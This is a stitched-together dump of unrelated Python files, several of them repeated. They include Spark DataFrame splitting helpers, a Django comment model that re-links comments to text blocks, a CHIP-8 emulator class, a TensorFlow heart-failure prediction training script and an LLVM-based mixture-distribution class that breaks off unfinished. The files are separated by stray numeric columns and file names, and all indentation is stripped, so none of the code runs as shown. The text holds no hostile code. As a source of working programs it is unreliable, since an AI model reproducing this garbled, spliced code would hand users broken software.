String representing the spark function to use for the given DatePart.
"""
date_part: DatePart = DatePart(date_part)
spark_date_part_decoder: dict = {
DatePart.YEAR: "year",
DatePart.MONTH: "month",
DatePart.WEEK: "weekofyear",
DatePart.DAY: "dayofmonth",
DatePart.HOUR: "hour",
DatePart.MINUTE: "minute",
DatePart.SECOND: "second",
}
return spark_date_part_decoder[date_part]
@staticmethod
def split_on_whole_table(
df: DataFrame,
) -> DataFrame:
"""No op. Return the same data that is passed in.
Args:
df: Spark DataFrame that will be returned
Returns:
Unfiltered DataFrame.
"""
return df
@staticmethod
def split_on_column_value(
df, column_name: str, batch_identifiers: dict
) -> DataFrame:
"""Return a dataframe where rows are filtered based on the specified column value.
Args:
df: Spark DataFrame to be filtered.
column_name: Column to use in comparison.
batch_identifiers: Contains value to use in comparison e.g. batch_identifiers={ 'col': value }.
Returns:
Filtered spark DataFrame.
"""
return df.filter(F.col(column_name) == batch_identifiers[column_name])
@staticmethod
def split_on_converted_datetime(
df,
column_name: str,
batch_identifiers: dict,
date_format_string: str = "yyyy-MM-dd",
) -> DataFrame:
"""Return a dataframe where rows are filtered based on whether their converted
datetime (using date_format_string) matches the datetime string value provided
in batch_identifiers for the specified column.
Args:
df: Spark DataFrame to be filtered.
column_name: Column to use in comparison.
batch_identifiers: Value to use in comparison as {column_name: datetime string}.
date_format_string: Format used to convert datetime column for comparison to
batch identifiers.
Returns:
Filtered spark DataFrame.
"""
matching_string = batch_identifiers[column_name]
res = (
df.withColumn(
"date_time_tmp", F.from_unixtime(F.col(column_name), date_format_string)
)
.filter(F.col("date_time_tmp") == matching_string)
.drop("date_time_tmp")
)
return res
@staticmethod
def split_on_divided_integer(
df, column_name: str, divisor: int, batch_identifiers: dict
):
"""Divide the values in the named column by `divisor`, and split on that"""
matching_divisor = batch_identifiers[column_name]
res = (
df.withColumn(
"div_temp",
(F.col(column_name) / divisor).cast(sparktypes.IntegerType()),
)
.filter(F.col("div_temp") == matching_divisor)
.drop("div_temp")
)
return res
@staticmethod
def split_on_mod_integer(df, column_name: str, mod: int, batch_identifiers: dict):
"""Divide the values in the named column by `divisor`, and split on that"""
matching_mod_value = batch_identifiers[column_name]
res = (
df.withColumn(
"mod_temp", (F.col(column_name) % mod).cast(sparktypes.IntegerType())
)
.filter(F.col("mod_temp") == matching_mod_value)
.drop("mod_temp")
)
return res
@staticmethod
def split_on_multi_column_values(df, column_names: list, batch_identifiers: dict):
"""Split on the joint values in the named columns"""
for column_name in column_names:
value = batch_identifiers.get(column_name)
if not value:
raise ValueError(
f"In order for SparkDFExecutionEngine to `_split_on_multi_column_values`, "
f"all values in column_names must also exist in batch_identifiers. "
f"{column_name} was not found in batch_identifiers."
)
df = df.filter(F.col(column_name) == value)
return df
@staticmethod
def split_on_hashed_column(
df,
column_name: str,
hash_digits: int,
batch_identifiers: dict,
hash_function_name: str = "sha256",
):
"""Split on the hashed value of the named column"""
try:
getattr(hashlib, hash_function_name)
except (TypeError, AttributeError):
raise (
ge_exceptions.ExecutionEngineError(
f"""The splitting method used with SparkDFExecutionEngine has a reference to an invalid hash_function_name.
Reference to {hash_function_name} cannot be found."""
)
)
def _encrypt_value(to_encode):
hash_func = getattr(hashlib, hash_function_name)
hashed_value = hash_func(to_encode.encode()).hexdigest()[-1 * hash_digits :]
return hashed_value
encrypt_udf = F.udf(_encrypt_value, sparktypes.StringType())
res = (
df.withColumn("encrypted_value", encrypt_udf(column_name))
.filter(F.col("encrypted_value") == batch_identifiers["hash_value"])
.drop("encrypted_value")
)
return res | 0.898639 | 0.610628 |
import difflib
from django.contrib.comments.models import Comment
from django.db import models
from django.utils.translation import ugettext as _
from block_comment.diff_match_patch import diff_match_patch
class BlockComment(Comment):
'''
``BlockComment`` extends Django's comments framework to store information
about the block of text the comment relates to.
'''
# Position in the full text that the block the comment relates to begins at
index = models.PositiveIntegerField(null=True, blank=True)
# The text of the block, used for determining diffs/orphans
regarding = models.TextField(blank=True)
def get_match_index(self, haystack):
''' Returns the index of the closest match to needle within
the haystack. '''
def get_block_index(i):
''' ``haystack`` and ``blocks`` are accessible by closure. '''
return haystack.index(blocks[i])
needle = self.regarding.strip()
matches = []
blocks = haystack.split("\n")
block_index = None
# Check for an exact match first
if needle in blocks:
return get_block_index(blocks.index(needle))
# If that didn't work, do a basic diff comparison block-by-block
for p in blocks:
comp = difflib.SequenceMatcher(None, needle, p)
if comp.ratio() > .85:
matches.append(blocks.index(comp.b))
if len(matches) == 1:
block_index = matches.pop()
elif len(matches) == 0:
# No matches, can we find a potential match with a smarter
# matching algorithm?
matcher = diff_match_patch()
index = matcher.match_main(haystack, needle, 0)
if index > -1:
return index
else:
# We've got multiple options, let's narrow them down with
# a smarter matching algorithm.
matcher = diff_match_patch()
for i in tuple(matches):
if matcher.match_main(blocks[i], needle, self.index) < 0:
# No match, discard this option
matches.remove(i)
# Unless we've only got one match left, we'll fall through to -1
if len(matches) == 1:
block_index = matches[0]
if block_index:
return get_block_index(block_index)
# If we can't find anything, return -1
return -1
def relink_comment(self, haystack, save=True):
index = self.get_match_index(haystack)
if index == self.index:
return None
elif index > -1:
self.index = index
else:
self.index = None
if save:
self.save() | block_comment/models.py |
import difflib
from django.contrib.comments.models import Comment
from django.db import models
from django.utils.translation import ugettext as _
from block_comment.diff_match_patch import diff_match_patch
class BlockComment(Comment):
'''
``BlockComment`` extends Django's comments framework to store information
about the block of text the comment relates to.
'''
# Position in the full text that the block the comment relates to begins at
index = models.PositiveIntegerField(null=True, blank=True)
# The text of the block, used for determining diffs/orphans
regarding = models.TextField(blank=True)
def get_match_index(self, haystack):
''' Returns the index of the closest match to needle within
the haystack. '''
def get_block_index(i):
''' ``haystack`` and ``blocks`` are accessible by closure. '''
return haystack.index(blocks[i])
needle = self.regarding.strip()
matches = []
blocks = haystack.split("\n")
block_index = None
# Check for an exact match first
if needle in blocks:
return get_block_index(blocks.index(needle))
# If that didn't work, do a basic diff comparison block-by-block
for p in blocks:
comp = difflib.SequenceMatcher(None, needle, p)
if comp.ratio() > .85:
matches.append(blocks.index(comp.b))
if len(matches) == 1:
block_index = matches.pop()
elif len(matches) == 0:
# No matches, can we find a potential match with a smarter
# matching algorithm?
matcher = diff_match_patch()
index = matcher.match_main(haystack, needle, 0)
if index > -1:
return index
else:
# We've got multiple options, let's narrow them down with
# a smarter matching algorithm.
matcher = diff_match_patch()
for i in tuple(matches):
if matcher.match_main(blocks[i], needle, self.index) < 0:
# No match, discard this option
matches.remove(i)
# Unless we've only got one match left, we'll fall through to -1
if len(matches) == 1:
block_index = matches[0]
if block_index:
return get_block_index(block_index)
# If we can't find anything, return -1
return -1
def relink_comment(self, haystack, save=True):
index = self.get_match_index(haystack)
if index == self.index:
return None
elif index > -1:
self.index = index
else:
self.index = None
if save:
self.save() | 0.591369 | 0.380241 |
import array
from collections import namedtuple
import pathlib
import time
from .clock import stabilize_frame
from .code import dispatch
from .config import Config
from .debug import Disassembler
from .errors import ChippyError
from .processor import ExecutionUnit
from .status import Mode
from .window import buzz, Window
class Chippy:
def __init__(self, config=Config()):
"""Initialize RAM, registers, stack, IO and sprite data."""
self.ram = bytearray([0x00] * 4096)
self.registers = bytearray([0x00] * 16)
self.I = 0x0000
self.sound_timer = 0x00
self.delay_timer = 0x00
self.program_counter = 0x0200
self.stack_pointer = 0x00
self.stack = array.array('H', [0x0000] * 16)
self.keypad = 0x0000
self.display = None
# 64-by-32 display
self.initialize_display()
self.initialize_sprite_data()
self.status = Mode.STOP
self.waiting = []
self.config = config
self.disassembler = Disassembler()
self.execution_unit = ExecutionUnit(self)
def initialize_display(self):
"""Clear display."""
self.display = array.array('Q', [0x0000000000000000] * 32)
def initialize_sprite_data(self):
"""Initialize sprite data in locates 0x000 to 0x050."""
self.ram[:5] = (0xf0, 0x90, 0x90, 0x90, 0xf0)
self.ram[5:10] = (0x20, 0x60, 0x20, 0x20, 0x70)
self.ram[10:15] = (0Xf0, 0x10, 0xf0, 0x80, 0xf0)
self.ram[15:20] = (0xf0, 0x10, 0xf0, 0x10, 0xf0)
self.ram[20:25] = (0x90, 0x90, 0xf0, 0x10, 0x10)
self.ram[25:30] = (0xf0, 0x80, 0xf0, 0x10, 0xf0)
self.ram[30:35] = (0xf0, 0x80, 0xf0, 0x90, 0xf0)
self.ram[35:40] = (0xf0, 0x10, 0x20, 0x40, 0x40)
self.ram[40:45] = (0xf0, 0x90, 0xf0, 0x90, 0xf0)
self.ram[45:50] = (0xf0, 0x90, 0xf0, 0x10, 0xf0)
self.ram[50:55] = (0xf0, 0x90, 0xf0, 0x90, 0x90)
self.ram[55:60] = (0xe0, 0x90, 0xe0, 0x90, 0xe0)
self.ram[60:65] = (0xf0, 0x80, 0x80, 0x80, 0xf0)
self.ram[65:70] = (0xe0, 0x90, 0x90, 0x90, 0xe0)
self.ram[70:75] = (0xf0, 0x80, 0xf0, 0x80, 0xf0)
self.ram[75:80] = (0xf0, 0x80, 0xf0, 0x80, 0x80)
def jump(self, target):
"""Jump to target location."""
if target < 0x200 or target >= len(self.ram):
raise ChippyError(f"Invalid jump target: {target:#05x}")
self.program_counter = target
def load(self, program: pathlib.Path):
"""Load program into address 0x200."""
binary = program.read_bytes()
size = len(binary)
if size >= len(self.ram) - 0x200:
raise ChippyError("Ran out of memory.")
self.ram[0x200:size + 0x200] = binary
def fetch(self):
"""Fetch current instruction."""
msb = self.ram[self.program_counter]
lsb = self.ram[self.program_counter + 1]
return (msb << 8) | lsb
def increment(self):
"""Increment program counter.
This is called by instruction handlers.
"""
self.program_counter += 2
self.program_counter &= 0x0fff
def cycle(self):
"""Simulate one cycle."""
if not self.waiting:
instruction = self.fetch()
self.increment()
print(dispatch(instruction, self.disassembler))
dispatch(instruction, self.execution_unit)
def countdown(self):
"""Decrement timers and perform timer-related actions."""
if self.delay_timer > 0:
self.delay_timer -= 1
if self.sound_timer > 0:
self.sound_timer -= 1
buzz()
def run(self):
"""Run program stored in memory."""
self.status = Mode.RUN
window = Window(self)
window.init_screen()
stages = (self.cycle, window.handle_events, window.render)
timer_60Hz = 0.01667
while self.status != Mode.STOP:
if self.status == Mode.RUN:
elapsed = stabilize_frame(self.config.clock_period, *stages)
timer_60Hz -= elapsed
if timer_60Hz <= 0:
timer_60Hz = 0.01667
self.countdown()
elif self.status == Mode.PAUSE:
window.handle_events()
window.render() | chippy/chippy.py |
import array
from collections import namedtuple
import pathlib
import time
from .clock import stabilize_frame
from .code import dispatch
from .config import Config
from .debug import Disassembler
from .errors import ChippyError
from .processor import ExecutionUnit
from .status import Mode
from .window import buzz, Window
class Chippy:
def __init__(self, config=Config()):
"""Initialize RAM, registers, stack, IO and sprite data."""
self.ram = bytearray([0x00] * 4096)
self.registers = bytearray([0x00] * 16)
self.I = 0x0000
self.sound_timer = 0x00
self.delay_timer = 0x00
self.program_counter = 0x0200
self.stack_pointer = 0x00
self.stack = array.array('H', [0x0000] * 16)
self.keypad = 0x0000
self.display = None
# 64-by-32 display
self.initialize_display()
self.initialize_sprite_data()
self.status = Mode.STOP
self.waiting = []
self.config = config
self.disassembler = Disassembler()
self.execution_unit = ExecutionUnit(self)
def initialize_display(self):
"""Clear display."""
self.display = array.array('Q', [0x0000000000000000] * 32)
def initialize_sprite_data(self):
"""Initialize sprite data in locates 0x000 to 0x050."""
self.ram[:5] = (0xf0, 0x90, 0x90, 0x90, 0xf0)
self.ram[5:10] = (0x20, 0x60, 0x20, 0x20, 0x70)
self.ram[10:15] = (0Xf0, 0x10, 0xf0, 0x80, 0xf0)
self.ram[15:20] = (0xf0, 0x10, 0xf0, 0x10, 0xf0)
self.ram[20:25] = (0x90, 0x90, 0xf0, 0x10, 0x10)
self.ram[25:30] = (0xf0, 0x80, 0xf0, 0x10, 0xf0)
self.ram[30:35] = (0xf0, 0x80, 0xf0, 0x90, 0xf0)
self.ram[35:40] = (0xf0, 0x10, 0x20, 0x40, 0x40)
self.ram[40:45] = (0xf0, 0x90, 0xf0, 0x90, 0xf0)
self.ram[45:50] = (0xf0, 0x90, 0xf0, 0x10, 0xf0)
self.ram[50:55] = (0xf0, 0x90, 0xf0, 0x90, 0x90)
self.ram[55:60] = (0xe0, 0x90, 0xe0, 0x90, 0xe0)
self.ram[60:65] = (0xf0, 0x80, 0x80, 0x80, 0xf0)
self.ram[65:70] = (0xe0, 0x90, 0x90, 0x90, 0xe0)
self.ram[70:75] = (0xf0, 0x80, 0xf0, 0x80, 0xf0)
self.ram[75:80] = (0xf0, 0x80, 0xf0, 0x80, 0x80)
def jump(self, target):
"""Jump to target location."""
if target < 0x200 or target >= len(self.ram):
raise ChippyError(f"Invalid jump target: {target:#05x}")
self.program_counter = target
def load(self, program: pathlib.Path):
"""Load program into address 0x200."""
binary = program.read_bytes()
size = len(binary)
if size >= len(self.ram) - 0x200:
raise ChippyError("Ran out of memory.")
self.ram[0x200:size + 0x200] = binary
def fetch(self):
"""Fetch current instruction."""
msb = self.ram[self.program_counter]
lsb = self.ram[self.program_counter + 1]
return (msb << 8) | lsb
def increment(self):
"""Increment program counter.
This is called by instruction handlers.
"""
self.program_counter += 2
self.program_counter &= 0x0fff
def cycle(self):
"""Simulate one cycle."""
if not self.waiting:
instruction = self.fetch()
self.increment()
print(dispatch(instruction, self.disassembler))
dispatch(instruction, self.execution_unit)
def countdown(self):
"""Decrement timers and perform timer-related actions."""
if self.delay_timer > 0:
self.delay_timer -= 1
if self.sound_timer > 0:
self.sound_timer -= 1
buzz()
def run(self):
"""Run program stored in memory."""
self.status = Mode.RUN
window = Window(self)
window.init_screen()
stages = (self.cycle, window.handle_events, window.render)
timer_60Hz = 0.01667
while self.status != Mode.STOP:
if self.status == Mode.RUN:
elapsed = stabilize_frame(self.config.clock_period, *stages)
timer_60Hz -= elapsed
if timer_60Hz <= 0:
timer_60Hz = 0.01667
self.countdown()
elif self.status == Mode.PAUSE:
window.handle_events()
window.render() | 0.615781 | 0.229686 |
import os
import random
import _pickle as pickle
import tensorflow as tf
from tensorflow.keras.callbacks import LearningRateScheduler
import numpy as np
from models.model import Sherbet, SherbetFeature
from models.loss import medical_codes_loss
from metrics import EvaluateCodesCallBack, EvaluateHFCallBack
from utils import DataGenerator, lr_decay
seed = 6669
random.seed(seed)
np.random.seed(seed)
tf.random.set_seed(seed)
def load_data(dataset_path):
encoded_path = os.path.join(dataset_path, 'encoded')
standard_path = os.path.join(dataset_path, 'standard')
code_maps = pickle.load(open(os.path.join(encoded_path, 'code_maps.pkl'), 'rb'))
pretrain_codes_data = pickle.load(open(os.path.join(standard_path, 'pretrain_codes_dataset.pkl'), 'rb'))
codes_dataset = pickle.load(open(os.path.join(standard_path, 'codes_dataset.pkl'), 'rb'))
hf_dataset = pickle.load(open(os.path.join(standard_path, 'heart_failure.pkl'), 'rb'))
auxiliary = pickle.load(open(os.path.join(standard_path, 'auxiliary.pkl'), 'rb'))
return code_maps, pretrain_codes_data, codes_dataset, hf_dataset, auxiliary
if __name__ == '__main__':
dataset = 'mimic3' # 'mimic3' or 'eicu'
dataset_path = os.path.join('data', dataset)
code_maps, pretrain_codes_data, codes_dataset, hf_dataset, auxiliary = load_data(dataset_path)
code_map, code_map_pretrain = code_maps['code_map'], code_maps['code_map_pretrain']
(train_codes_data, valid_codes_data, test_codes_data) = (codes_dataset['train_codes_data'],
codes_dataset['valid_codes_data'],
codes_dataset['test_codes_data'])
(train_hf_y, valid_hf_y, test_hf_y) = hf_dataset['train_hf_y'], hf_dataset['valid_hf_y'], hf_dataset['test_hf_y']
(pretrain_codes_x, pretrain_codes_y, pretrain_y_h, pretrain_visit_lens) = pretrain_codes_data
(train_codes_x, train_codes_y, train_y_h, train_visit_lens) = train_codes_data
(valid_codes_x, valid_codes_y, valid_y_h, valid_visit_lens) = valid_codes_data
(test_codes_x, test_codes_y, test_y_h, test_visit_lens) = test_codes_data
(code_levels, code_levels_pretrain,
subclass_maps, subclass_maps_pretrain,
code_code_adj) = (auxiliary['code_levels'], auxiliary['code_levels_pretrain'],
auxiliary['subclass_maps'], auxiliary['subclass_maps_pretrain'],
auxiliary['code_code_adj'])
op_conf = {
'pretrain': False,
'from_pretrain': True,
'pretrain_path': './saved/hyperbolic/%s/sherbet_a/sherbet_pretrain' % dataset,
'use_embedding_init': True,
'use_hierarchical_decoder': True,
'task': 'h', # m: medical codes, h: heart failure
}
feature_model_conf = {
'code_num': len(code_map_pretrain),
'code_embedding_init': None,
'adj': code_code_adj,
'max_visit_num': train_codes_x.shape[1]
}
pretrain_model_conf = {
'use_hierarchical_decoder': op_conf['use_hierarchical_decoder'],
'subclass_dims': np.max(code_levels_pretrain, axis=0) if op_conf['use_hierarchical_decoder'] else None,
'subclass_maps': subclass_maps_pretrain if op_conf['use_hierarchical_decoder'] else None,
'output_dim': len(code_map_pretrain),
'activation': None
}
task_conf = {
'm': {
'output_dim': len(code_map),
'activation': None,
'loss_fn': medical_codes_loss,
'label': {
'train': train_codes_y.astype(np.float32),
'valid': valid_codes_y.astype(np.float32),
'test': test_codes_y.astype(np.float32)
},
'evaluate_fn': EvaluateCodesCallBack
},
'h': {
'output_dim': 1,
'activation': 'sigmoid',
'loss_fn': 'binary_crossentropy',
'label': {
'train': train_hf_y.astype(np.float32),
'valid': valid_hf_y.astype(np.float32),
'test': test_hf_y.astype(np.float32)
},
'evaluate_fn': EvaluateHFCallBack
}
}
model_conf = {
'use_hierarchical_decoder': False,
'output_dim': task_conf[op_conf['task']]['output_dim'],
'activation': task_conf[op_conf['task']]['activation']
}
hyper_params = {
'code_embedding_size': 128,
'hiddens': [64],
'attention_size_code': 64,
'attention_size_visit': 32,
'patient_size': 64,
'patient_activation': tf.keras.layers.LeakyReLU(),
'pretrain_epoch': 1000,
'pretrain_batch_size': 128,
'epoch': 200,
'batch_size': 32,
'gnn_dropout_rate': 0.8,
'decoder_dropout_rate': 0.17
}
if op_conf['use_embedding_init']:
if op_conf['pretrain'] or (not op_conf['from_pretrain']):
embedding_init = pickle.load(open('./saved/hyperbolic/%s_leaf_embeddings' % dataset, 'rb'))
feature_model_conf['code_embedding_init'] = embedding_init
sherbet_feature = SherbetFeature(feature_model_conf, hyper_params)
if op_conf['pretrain']:
pretrain_x = {
'visit_codes': pretrain_codes_x,
'visit_lens': pretrain_visit_lens
}
if op_conf['use_hierarchical_decoder']:
pretrain_x['y_trues'] = pretrain_y_h
pretrain_y = None
else:
pretrain_y = pretrain_codes_y.astype(np.float32)
init_lr = 1e-2
# split_val = [(20, 1e-3), (150, 1e-4), (500, 1e-5)]
split_val = [(100, 1e-3)]
lr_schedule_fn = lr_decay(total_epoch=hyper_params['epoch'], init_lr=init_lr, split_val=split_val)
lr_scheduler = LearningRateScheduler(lr_schedule_fn)
loss_fn = None if op_conf['use_hierarchical_decoder'] else medical_codes_loss
sherbet_pretrain = Sherbet(sherbet_feature, pretrain_model_conf, hyper_params)
sherbet_pretrain.compile(optimizer='rmsprop', loss=loss_fn)
sherbet_pretrain.fit(x=pretrain_x, y=pretrain_y,
batch_size=hyper_params['pretrain_batch_size'], epochs=hyper_params['pretrain_epoch'],
callbacks=[lr_scheduler])
sherbet_pretrain.save_weights(op_conf['pretrain_path'])
else:
if op_conf['from_pretrain']:
sherbet_pretrain = Sherbet(sherbet_feature, pretrain_model_conf, hyper_params)
sherbet_pretrain.load_weights(op_conf['pretrain_path'])
x = {
'visit_codes': train_codes_x,
'visit_lens': train_visit_lens
}
valid_x = {
'visit_codes': valid_codes_x,
'visit_lens': valid_visit_lens
}
y = task_conf[op_conf['task']]['label']['train']
valid_y = task_conf[op_conf['task']]['label']['valid']
test_y = task_conf[op_conf['task']]['label']['test']
# mimic3 m a, b, c
# init_lr = 1e-2
# split_val = [(20, 1e-3), (35, 1e-4), (100, 1e-5)]
# mimic3 m d, e
# init_lr = 1e-2
# split_val = [(25, 1e-3), (40, 1e-4), (800, 1e-5)]
# mimic3 h a, b, c
init_lr = 1e-2
split_val = [(25, 1e-3), (40, 1e-4), (45, 1e-5)]
# split_val = [(10, 1e-3), (80, 1e-4), (100, 1e-5)]
# mimic3 h d, e
# init_lr = 1e-3
# split_val = [(8, 1e-4), (10, 1e-5), (15, 1e-6)]
# eicu m a, b, c
# init_lr = 1e-2
# split_val = [(50, 1e-3), (60, 1e-4), (100, 1e-5)]
lr_schedule_fn = lr_decay(total_epoch=hyper_params['epoch'], init_lr=init_lr, split_val=split_val)
test_codes_gen = DataGenerator([test_codes_x, test_visit_lens], shuffle=False, batch_size=128)
loss_fn = task_conf[op_conf['task']]['loss_fn']
lr_scheduler = LearningRateScheduler(lr_schedule_fn)
test_callback = task_conf[op_conf['task']]['evaluate_fn'](test_codes_gen, test_y)
sherbet = Sherbet(sherbet_feature, model_conf, hyper_params)
sherbet.compile(optimizer='rmsprop', loss=loss_fn)
history = sherbet.fit(x=x, y=y,
batch_size=hyper_params['batch_size'], epochs=hyper_params['epoch'],
callbacks=[lr_scheduler, test_callback])
sherbet.summary() | train.py | import os
import random
import _pickle as pickle
import tensorflow as tf
from tensorflow.keras.callbacks import LearningRateScheduler
import numpy as np
from models.model import Sherbet, SherbetFeature
from models.loss import medical_codes_loss
from metrics import EvaluateCodesCallBack, EvaluateHFCallBack
from utils import DataGenerator, lr_decay
seed = 6669
random.seed(seed)
np.random.seed(seed)
tf.random.set_seed(seed)
def load_data(dataset_path):
encoded_path = os.path.join(dataset_path, 'encoded')
standard_path = os.path.join(dataset_path, 'standard')
code_maps = pickle.load(open(os.path.join(encoded_path, 'code_maps.pkl'), 'rb'))
pretrain_codes_data = pickle.load(open(os.path.join(standard_path, 'pretrain_codes_dataset.pkl'), 'rb'))
codes_dataset = pickle.load(open(os.path.join(standard_path, 'codes_dataset.pkl'), 'rb'))
hf_dataset = pickle.load(open(os.path.join(standard_path, 'heart_failure.pkl'), 'rb'))
auxiliary = pickle.load(open(os.path.join(standard_path, 'auxiliary.pkl'), 'rb'))
return code_maps, pretrain_codes_data, codes_dataset, hf_dataset, auxiliary
if __name__ == '__main__':
dataset = 'mimic3' # 'mimic3' or 'eicu'
dataset_path = os.path.join('data', dataset)
code_maps, pretrain_codes_data, codes_dataset, hf_dataset, auxiliary = load_data(dataset_path)
code_map, code_map_pretrain = code_maps['code_map'], code_maps['code_map_pretrain']
(train_codes_data, valid_codes_data, test_codes_data) = (codes_dataset['train_codes_data'],
codes_dataset['valid_codes_data'],
codes_dataset['test_codes_data'])
(train_hf_y, valid_hf_y, test_hf_y) = hf_dataset['train_hf_y'], hf_dataset['valid_hf_y'], hf_dataset['test_hf_y']
(pretrain_codes_x, pretrain_codes_y, pretrain_y_h, pretrain_visit_lens) = pretrain_codes_data
(train_codes_x, train_codes_y, train_y_h, train_visit_lens) = train_codes_data
(valid_codes_x, valid_codes_y, valid_y_h, valid_visit_lens) = valid_codes_data
(test_codes_x, test_codes_y, test_y_h, test_visit_lens) = test_codes_data
(code_levels, code_levels_pretrain,
subclass_maps, subclass_maps_pretrain,
code_code_adj) = (auxiliary['code_levels'], auxiliary['code_levels_pretrain'],
auxiliary['subclass_maps'], auxiliary['subclass_maps_pretrain'],
auxiliary['code_code_adj'])
op_conf = {
'pretrain': False,
'from_pretrain': True,
'pretrain_path': './saved/hyperbolic/%s/sherbet_a/sherbet_pretrain' % dataset,
'use_embedding_init': True,
'use_hierarchical_decoder': True,
'task': 'h', # m: medical codes, h: heart failure
}
feature_model_conf = {
'code_num': len(code_map_pretrain),
'code_embedding_init': None,
'adj': code_code_adj,
'max_visit_num': train_codes_x.shape[1]
}
pretrain_model_conf = {
'use_hierarchical_decoder': op_conf['use_hierarchical_decoder'],
'subclass_dims': np.max(code_levels_pretrain, axis=0) if op_conf['use_hierarchical_decoder'] else None,
'subclass_maps': subclass_maps_pretrain if op_conf['use_hierarchical_decoder'] else None,
'output_dim': len(code_map_pretrain),
'activation': None
}
task_conf = {
'm': {
'output_dim': len(code_map),
'activation': None,
'loss_fn': medical_codes_loss,
'label': {
'train': train_codes_y.astype(np.float32),
'valid': valid_codes_y.astype(np.float32),
'test': test_codes_y.astype(np.float32)
},
'evaluate_fn': EvaluateCodesCallBack
},
'h': {
'output_dim': 1,
'activation': 'sigmoid',
'loss_fn': 'binary_crossentropy',
'label': {
'train': train_hf_y.astype(np.float32),
'valid': valid_hf_y.astype(np.float32),
'test': test_hf_y.astype(np.float32)
},
'evaluate_fn': EvaluateHFCallBack
}
}
model_conf = {
'use_hierarchical_decoder': False,
'output_dim': task_conf[op_conf['task']]['output_dim'],
'activation': task_conf[op_conf['task']]['activation']
}
hyper_params = {
'code_embedding_size': 128,
'hiddens': [64],
'attention_size_code': 64,
'attention_size_visit': 32,
'patient_size': 64,
'patient_activation': tf.keras.layers.LeakyReLU(),
'pretrain_epoch': 1000,
'pretrain_batch_size': 128,
'epoch': 200,
'batch_size': 32,
'gnn_dropout_rate': 0.8,
'decoder_dropout_rate': 0.17
}
if op_conf['use_embedding_init']:
if op_conf['pretrain'] or (not op_conf['from_pretrain']):
embedding_init = pickle.load(open('./saved/hyperbolic/%s_leaf_embeddings' % dataset, 'rb'))
feature_model_conf['code_embedding_init'] = embedding_init
sherbet_feature = SherbetFeature(feature_model_conf, hyper_params)
if op_conf['pretrain']:
pretrain_x = {
'visit_codes': pretrain_codes_x,
'visit_lens': pretrain_visit_lens
}
if op_conf['use_hierarchical_decoder']:
pretrain_x['y_trues'] = pretrain_y_h
pretrain_y = None
else:
pretrain_y = pretrain_codes_y.astype(np.float32)
init_lr = 1e-2
# split_val = [(20, 1e-3), (150, 1e-4), (500, 1e-5)]
split_val = [(100, 1e-3)]
lr_schedule_fn = lr_decay(total_epoch=hyper_params['epoch'], init_lr=init_lr, split_val=split_val)
lr_scheduler = LearningRateScheduler(lr_schedule_fn)
loss_fn = None if op_conf['use_hierarchical_decoder'] else medical_codes_loss
sherbet_pretrain = Sherbet(sherbet_feature, pretrain_model_conf, hyper_params)
sherbet_pretrain.compile(optimizer='rmsprop', loss=loss_fn)
sherbet_pretrain.fit(x=pretrain_x, y=pretrain_y,
batch_size=hyper_params['pretrain_batch_size'], epochs=hyper_params['pretrain_epoch'],
callbacks=[lr_scheduler])
sherbet_pretrain.save_weights(op_conf['pretrain_path'])
else:
if op_conf['from_pretrain']:
sherbet_pretrain = Sherbet(sherbet_feature, pretrain_model_conf, hyper_params)
sherbet_pretrain.load_weights(op_conf['pretrain_path'])
x = {
'visit_codes': train_codes_x,
'visit_lens': train_visit_lens
}
valid_x = {
'visit_codes': valid_codes_x,
'visit_lens': valid_visit_lens
}
y = task_conf[op_conf['task']]['label']['train']
valid_y = task_conf[op_conf['task']]['label']['valid']
test_y = task_conf[op_conf['task']]['label']['test']
# mimic3 m a, b, c
# init_lr = 1e-2
# split_val = [(20, 1e-3), (35, 1e-4), (100, 1e-5)]
# mimic3 m d, e
# init_lr = 1e-2
# split_val = [(25, 1e-3), (40, 1e-4), (800, 1e-5)]
# mimic3 h a, b, c
init_lr = 1e-2
split_val = [(25, 1e-3), (40, 1e-4), (45, 1e-5)]
# split_val = [(10, 1e-3), (80, 1e-4), (100, 1e-5)]
# mimic3 h d, e
# init_lr = 1e-3
# split_val = [(8, 1e-4), (10, 1e-5), (15, 1e-6)]
# eicu m a, b, c
# init_lr = 1e-2
# split_val = [(50, 1e-3), (60, 1e-4), (100, 1e-5)]
lr_schedule_fn = lr_decay(total_epoch=hyper_params['epoch'], init_lr=init_lr, split_val=split_val)
test_codes_gen = DataGenerator([test_codes_x, test_visit_lens], shuffle=False, batch_size=128)
loss_fn = task_conf[op_conf['task']]['loss_fn']
lr_scheduler = LearningRateScheduler(lr_schedule_fn)
test_callback = task_conf[op_conf['task']]['evaluate_fn'](test_codes_gen, test_y)
sherbet = Sherbet(sherbet_feature, model_conf, hyper_params)
sherbet.compile(optimizer='rmsprop', loss=loss_fn)
history = sherbet.fit(x=x, y=y,
batch_size=hyper_params['batch_size'], epochs=hyper_params['epoch'],
callbacks=[lr_scheduler, test_callback])
sherbet.summary() | 0.601711 | 0.155271 |
import sys
import numpy
import llvm.core
import qy
from qy import (
get_qy,
Function,
Variable,
StridedArray,
StridedArrays,
)
from llvm.core import (
Type,
Constant,
)
from cargo.log import get_logger
logger = get_logger(__name__)
def log_add_double(x, y):
"""
Return log(x + y) given log(x) and log(y); see [1].
[1] Digital Filtering Using Logarithmic Arithmetic.
Kingsbury and Rayner, 1970.
"""
if "log_add_d" in get_qy().module.global_variables:
log_add_d = Function.get_named("log_add_d")
else:
@Function.define(float, [float, float])
def log_add_d(x_in, y_in):
s = x_in >= y_in
a = qy.select(s, x_in, y_in)
@qy.if_else(a == -numpy.inf)
def _(then):
if then:
qy.return_(-numpy.inf)
else:
qy.return_(a + qy.log1p(qy.exp(qy.select(s, y_in, x_in) - a)))
return log_add_d(x, y)
class FiniteMixture(object):
"""
An arbitrary finite homogeneous mixture distribution.
"""
def __init__(self, distribution, K, iterations = 256, convergence = 1e-8):
"""
Initialize.
"""
self._distribution = distribution
self._K = K
self._iterations = iterations
self._convergence = convergence
self._parameter_dtype = \
numpy.dtype((
[
("p", numpy.float64),
("c", distribution.parameter_dtype),
],
(K,),
))
self._prior_dtype = numpy.dtype((distribution.prior_dtype, (K,)))
def get_emitter(self):
"""
Return an IR emitter for this distribution.
"""
return FiniteMixtureEmitter(self)
def posterior(self, parameter, samples):
"""
Return the posterior mixture weights.
"""
# compute the component likelihoods
post = numpy.ndarray(self.K)
for i in xrange(self.K):
ll = parameter[i]["p"]
for j in xrange(len(samples)):
ll += self.distribution.ll(parameter[i]["c"], samples[j])
post[i] = ll
# normalize and exponentiate
from cargo.statistics.functions import log_plus_all
post[:] -= log_plus_all(post)
numpy.exp(post, post)
return post
@property
def parameter_dtype(self):
"""
